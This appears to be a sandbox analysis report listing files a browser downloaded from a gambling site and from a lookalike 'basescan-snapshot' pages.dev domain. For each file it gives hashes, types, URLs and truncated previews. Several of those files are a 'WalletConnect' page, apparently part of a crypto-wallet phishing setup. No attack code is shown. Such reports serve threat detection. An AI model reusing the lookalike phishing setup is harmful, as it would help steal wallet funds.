                                                                                                                                                                                                                                              SSDEEP:192:+0jIoYNMtKw/N+vqZiZO2ChEDF1Jr1giCSxzGLCavohqgceqwLjOzdZy:JYNg7/N+wsMhql1giCSx/aQh6eqeUy
                                                                                                                                                                                                                                              MD5:539F6D16B932EB25D9DD14DAF8DA6156
                                                                                                                                                                                                                                              SHA1:162617A3F468411284DE969DB7666CBE04956031
                                                                                                                                                                                                                                              SHA-256:51F6FE3164F3A721398E10AB645E2C0A777468051C018D3AB278ABDC0F15B2BE
                                                                                                                                                                                                                                              SHA-512:4F9C942045145BE15ED48BC517DFEB17F75BD1D51E4A88A8B7F64F6ACA30D7DEFFBEA2CCA40295C79C956999ED85B9C4F65CE646111CDF5A8DF825EB2982ADEA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/4f7e7099e6.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..'>...(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1438)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):51879
                                                                                                                                                                                                                                              Entropy (8bit):5.226741198964019
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:qwh9i1bwF/X3P5F+O4PsJcEn8XN+Er5FIdBoe5RtZpNT5Jt9rvZaLdXQtJXmaIus:ZJwsR/7zO9
                                                                                                                                                                                                                                              MD5:C5B7C6A285DE01396DBD5E9C4C6E7F3B
                                                                                                                                                                                                                                              SHA1:2BAFD0F87E620CAF2CDCB363BEC5B940874299A3
                                                                                                                                                                                                                                              SHA-256:451AA4A96AEE683E12085563A614FC1502D951325D29CABB676C240DE80ADE71
                                                                                                                                                                                                                                              SHA-512:4827D6A549B7EEF53B9160ACD6C9E833CBB1132ECACA5CBD27E4F8F73879D6E4CABB248F893430F091BF4D2F2DBAE4B51250754B7316EDCB981D640C8EFCC9A3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var strAge=$("#hdnAgeText").val();var strDateTime=$("#hdnDateTimeText").val();var strDateTimeLocal="Date Time (Local)";var strDateTimeLocalShort="Local";var strSiteName=$("#hdnSiteName").val();var strAgeTitle=$("#hdnAgeTitle").val();var strDateTimeTitle=$("#hdnDateTimeTitle").val();var ageClass=".showAge";var dateTimeClass=".showDate";var localDateTimeClass=".showLocalDate".var localDateTimeNFTClass=".showLocalDateNFT".var offsetHoursFinal;var strTxnFee=$("#hdnTxnText").val();var strGasPrice=$("#hdnGasPriceText").val();function checkAdBlock(){var element=document.createElement("div");element.id="checkAdBlock".element.className="banner_ad";element.style.width="0.5px";document.body.appendChild(element);if($("#checkAdBlock").width()>0){return false;}else{return true;}}.function setAgeDateTimeCookie(strValue){var d=new Date();d.setFullYear(d.getFullYear()+1);var expires="expires="+d.toUTCString();document.cookie=strSiteName+"_switch_age_datetime="+strValue+";"+expires+";path=/";}.function
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):252
                                                                                                                                                                                                                                              Entropy (8bit):5.040900342723824
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:5zldoBvSIiPXEdv0IXq/llS+M+aD5X5yTMEfs1vavi8Dzv:Br4KIqu09SzJNc/ss3D
                                                                                                                                                                                                                                              MD5:8CD96C293A6ACAF84712D44761B9B6B8
                                                                                                                                                                                                                                              SHA1:516A9580846A81C29D4A99372B13E98DA8A335BE
                                                                                                                                                                                                                                              SHA-256:8D3B2E8C54FAFFDE1000625517901EED0F3B85841D499A7FF66DB6EDDBD28A18
                                                                                                                                                                                                                                              SHA-512:71DD80783D1F0ED5CA65461D50850055A9DCE3A21172A338638CB236B66E3CF90DA42973BCB24D5F83972352EF49AD56D4C3927FA8D68BE2D12E58F1094ED246
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/account2/assets/toInteger-d3049371.js
                                                                                                                                                                                                                                              Preview:import{t as o}from"./toNumber-2a781ab2.js";var i=1/0,f=17976931348623157e292;function I(r){if(!r)return r===0?r:0;if(r=o(r),r===i||r===-i){var t=r<0?-1:1;return t*f}return r===r?r:0}function N(r){var t=I(r),n=t%1;return t===t?n?t-n:t:0}export{N as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1698
                                                                                                                                                                                                                                              Entropy (8bit):7.883072199124864
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:6D4HtSwVy5WqbYBnC8kQf/Rjot30gdSJ9AFJkGoMrnJY8Ul2Y7uO8ajxD2U:zlqbYQIXJqg0toeq8UlN778VU
                                                                                                                                                                                                                                              MD5:32EA2E5C7A18AC7DCD52C511465F7478
                                                                                                                                                                                                                                              SHA1:463AAF6D78856FB20852460C1EF27A2EE8F87184
                                                                                                                                                                                                                                              SHA-256:D36F419083A169799AC92FDE55CBD36A7C4D495B0A2256C221ACFA5680AA49D4
                                                                                                                                                                                                                                              SHA-512:6E99EFA7870311EE4ADDEFEBEF85650BC8206F66DEDB46CBA6E45A71985C7F54738D5794E289D592C78E691285A181BD60C297053992DC470F4896F8C7D8FB2A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/c9-CnE9qdtZ.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../..!..`.m...3=....m$w...v...m.w.I..C....P...(..A.!X . ....Cb..>.q}"N.....R....T.-.#..to..._=..L.s...?.G..85ku..]s5=5..._Ei.O....g..?.1.S..._...-..&...s.........N[R...3(c.....s:.B..m....v..+..d..z:.o.J.......iDMW.}.>..A..n.1.t.:./!.....,...z9$.*0.|'1..$ZED~i",g7.5/R{i.e..$a..`.,........../V..,..}......y5.J....o..K'.... b})f..Y.#..../...w....Q.E.....|Ue...8.%t*%..{.p..p.^..*.{/.l_.....7.....2..?%F.b.;...68m.....D.?y...L^...;.\.nB{.rb]..M.X..>.<...V.g..+..jE..)*A....m.N!R..Z.^..Ai...U...W.2t.;...MR.L7..Hn.hlQ..@29..#.0Mw.p..@.....s.d`'......j{..:..T..j......NE.e.~....!5...V.!.....[.+.....n.1.Cc..#.8.hT...\fR...Uc.}9......^N:uzX.|..].We.W0....4.b.'~..d2@....,....S..V...."....I......N..P.Xo..h..%X`..+.(g.R...C....+.0.!....$&N...)....d.Hc.F.6..........r...%. .u...| v..Ci7..>U.-.....l..r.\.hp...........&.\9'....(....>,W..N..G.|.='.C.@&>.5..L.....<.T...b...w....).Z....*T.@q.+.`.LV.D....M.6O8a'..J....O.h...k..G..5.7......."
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 121 x 48, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                                                                                              Entropy (8bit):7.5459146893103775
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:JAF/fBp0NaeIXZql/TeiCuwrbyyU+nzJ7Z0RgumucmwnquCR8dNgab0KNWk:JA/5aMixFA93ZoguqmwTd6KNWk
                                                                                                                                                                                                                                              MD5:AB9889A918C1A57822EDB276B609A18B
                                                                                                                                                                                                                                              SHA1:B62C50EE52224C840C433423A653DC5FE63AC900
                                                                                                                                                                                                                                              SHA-256:800E6E0057B4B24DC4A78C5D15D8199625F151B00ABA87CEC241FCD9E48EFF0F
                                                                                                                                                                                                                                              SHA-512:F48AC485F9FFD642F6EC2FA9FFD5498A6111A5C835C98EDABA886DD9E61E1F382A49D762127C5D7BFC36F2DBE113CE247241A914C33E0B05124EF06933140969
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...y...0......s%.....sRGB.........gAMA......a.....PLTE.........@.PP..0.P.P@.P0@..............H..@..8.X.H8.@8.........5.U......4.T.D8.D4......C..3.S.C6.........B..B..5.R2.R.E5.B5...........4.T.B4.B7....D4...B..4.T.B6.....B.....5.S3.S.C5...............B..5.S.C7.C5......5.S3.S.C5............4.U4.S.C6.C6...............C..4.T4.S.D5.C5.........C..6._4.T.D5.........B..B..5.S3.S.C6.C5...B..4.S.C4.C5..................'...x s.:M.IB..A..=..6.g.R/:..5.]4.S.C5.......rtRNS......... 0000@@@@@PPPPP`````````ppppppp........................................................................."IDATx..iW.@....DM.(. .u.Dm.VD.HQA\...E...V.`U..qI...4.4....<_...s..w..S.`...X...8..N5.*...)c..V.F.LV.M-d(M`Y8<.Tr.|......3......I..x....`\..D..Af.{z.O.Xa& 1..:...f\.@..Zn.Xm.U..0...H.S.......q..X..$b.....q3..h6.2..M.u..m.b.#S....M%....s&...R....P.].|}.P...e. ...i...L....<...r0...R...E+........Q..`7.,..2k..H0./Ku.."s.b+Q..YP.J.!..k...)!<q0L....2..H..`.".FI,s...=.Yv.T"2g.@.h .
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):231450
                                                                                                                                                                                                                                              Entropy (8bit):7.866586559286422
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:F2gfnd7IJS/Ze6hSaiIRGN1qKqdmzhIYPCbctUTt0Y:F2ane6hpcxNr4r
                                                                                                                                                                                                                                              MD5:F87499B07B980311182830BD49E3D9C0
                                                                                                                                                                                                                                              SHA1:04D06C45D44F812767E92569E68B3D6C308B1D4A
                                                                                                                                                                                                                                              SHA-256:DD03225878696CBE94B579DE74EFF1DB80618225D8B02C97546C6B38F26FDB8B
                                                                                                                                                                                                                                              SHA-512:A40BC31F093F1C52288EA678AEDC7B09F779636F3560E071FB1E9736B2A5D68166D600AD7A8A9DE275898C0864137B615BD725FE88CB6B326E80956D7906E3F0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.......~.....PLTE....R$...NZ:"..4L4).(:( ...Y.e6..t..09(".W.'......................................w..~....q..j....b..x..q....l..Z..P..c.....X..d.q..C.P.b...F.N.W..7.b.>.D.t.. ...U.E.7..5._.$.=./.m..'.P...C.5...'.U......!.E.4.b..... ...*.....L....;.+.....Y.......z...D... .../.~..o..~...8........P...v...(..A....z..|..f..o..r..y(.{3.y..u..u..a..f..w?.u".u..p..q..i..u..q,.l..]..m..p..d..h..e..i..l3.N .X..i%.mV.i..c..b..\..d..S.._..d3.I..a#ncr.Q..].._..Z..F..X..Y..Z'.Y..L..U..V..C.|X1.Q..T..R..D..L..Q.[Vb.L..A..I.|M..K..?..E.nL(RP\yH.~E..<.rD..5.vB.@N].;.JJSaC%VC=k>.{7.p<../.CDMi8.c8.s1.6CQ|+.V: L;-<>GE;<b2.j-.r'.\0.78Ba*.B3&S/.e$.*7BI/.W).31:Y#.O'.5,&,+5;'.G#./'"'%.<..*".#!% .*2..%.... !..)....................rm.B....tRNS...%?Pf......................................................................................................................................De....=IDATx..........................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9097
                                                                                                                                                                                                                                              Entropy (8bit):7.6819966405930495
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7GoYNMtKwX7xdmwv7yaWF7gOiygyyfWAJVRu7Z:AYNg7X7xMwv7v5BNfxJuZ
                                                                                                                                                                                                                                              MD5:2A3D151BDB1728D397926F94971CF524
                                                                                                                                                                                                                                              SHA1:A7D80E1CA7D58B165786271B8483FC7F0EAE047D
                                                                                                                                                                                                                                              SHA-256:B4ACF0458072B94D1ED615E055F2FBD2B3B3F93DE129FF9BBF7BCA8171A54F72
                                                                                                                                                                                                                                              SHA-512:EA712B7D2B76B555DD59E150B4927C04A85B9839409572B31A037B19DA6386236ED2781070D8222CCA5B5F99C97149D9EE61256824C43DB733A2B0C8C5A5ED71
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/b0543d5f29.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F...C.............<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):7464
                                                                                                                                                                                                                                              Entropy (8bit):7.969339389757611
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:IlzBvfflH/jXaqO79Gq2UYkMOeFVKYTLInnP5:INBHdfDaf9Gq2UrMJccEnh
                                                                                                                                                                                                                                              MD5:0D05F17BFB2061B8DADA721FA087484C
                                                                                                                                                                                                                                              SHA1:B85418851E7860C8DB18159614F94700D4FB4D3C
                                                                                                                                                                                                                                              SHA-256:BC0C74AE01EB29917FF48738263E3C9C0F6E5EDFBCF3E31281EFBCE8F074311C
                                                                                                                                                                                                                                              SHA-512:A72184B29032C5C8CA70163CF112628EEDB6A81DC9FEF11FA5C695EC73EB747796476F095ADF6E9EBCD2C396B2D4FBD1E64B69751BA61FF55BE0CA9E4427A3F0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00
                                                                                                                                                                                                                                              Preview:RIFF ...WEBPVP8 ........*....>I".D..!...d(.....%..'.v.R.}.1._.....u?.....?f>.x'...w....L...._....7...o.g.?R....{......+.../............/....?l...;.......W..Qo.....}I=..j.\....|+~.~......N..........f.....O...~.|x...........M...#./._....D........[......v...Y.].Z....[..T.C...d..&.Y0:..L....x....`u.....d..h.:..9......-..._.an[.r.Clx.g.$.8...Nl.]<^.6.-..l-{H.{..].....|......\h....O....f....%...fi..h........p../x......K.jWh(.9..@n.J..."....@G>..mn.o2...fJ..0h....t..t....k....\Pjo.......>...0.m.Ql.(...s|($0.....I7a.3.0.G#..e.e..._+/...8....}.........Z..J....O..F...-}`t......w..Bw.j........c).&.&.\...J..&.I4._...2........cu.....'...*....Q..*...)......Z&.V.............a.0.H)aG.OD.IJ...4.D6Z....]...=OB.|>UKNu&.5U...}...0h..$..Q9D...[.)..C5...<....g.$.....N1?.Yd..3...O.V.|.c)..b<....x......N.U....P.P....a..J.._.z.v.M/\G.a.4%.)("......?=.5.b..'.....L.]....$.ez....H....Wf..8..e..:.=..z. .'w0dDD..P+..M....|........5........n...b.n...R.a.9....4.R.Q?....a..4R.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1341
                                                                                                                                                                                                                                              Entropy (8bit):5.971800298060396
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LGkzum8COZNDsLlpGPUc6QliQnisJGpU0WDst+6VxsD7uQ8WDk8+Uol:+ZYjwGklfll0xliQnisJkUTjMsOuCU4
                                                                                                                                                                                                                                              MD5:B8BC32CD380413E326F26FEFD08715A7
                                                                                                                                                                                                                                              SHA1:EBD72309E3C293F32EECC4DBB995C53D3754DA32
                                                                                                                                                                                                                                              SHA-256:6402FAACC9CED0E99AC2BA339BCC1948A21B3F1B3F0BFF684470FD63E1E0F915
                                                                                                                                                                                                                                              SHA-512:C5DF42910BE27AD7BA8577F51A471BA4F4BC49C1ACFA6A16AB96F6642479EAAF2A937173A1079E6F9EEFF386998B1B553257069D2007BA628C1E9C20949D2909
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/15029_Gates%20of%20Olympus%201000.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..+V.....OF..Vc..D#.m.,J..&0.iP........L..o.=,x...8|..u.]Mw...e.....^7@r...#..&.....*@....m.....u.....u.AWx.Q.!..c....t.R.!..&v."... .....u%. .tft.c]...,..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 136 x 136, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1791
                                                                                                                                                                                                                                              Entropy (8bit):7.840831955523229
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:3IvgQIEg9MZz7HvATly2KjXR4KpONkGwazr:IgvJiz7vR4RCG1zr
                                                                                                                                                                                                                                              MD5:8001A6AAD88973E41B32E77EA919E83E
                                                                                                                                                                                                                                              SHA1:A445A75A9B660B8D724956BF4785D6B3FAF3C450
                                                                                                                                                                                                                                              SHA-256:1D0A87144F812861B2E72CB70652596BFE1DEA204680C289799C5519A754430E
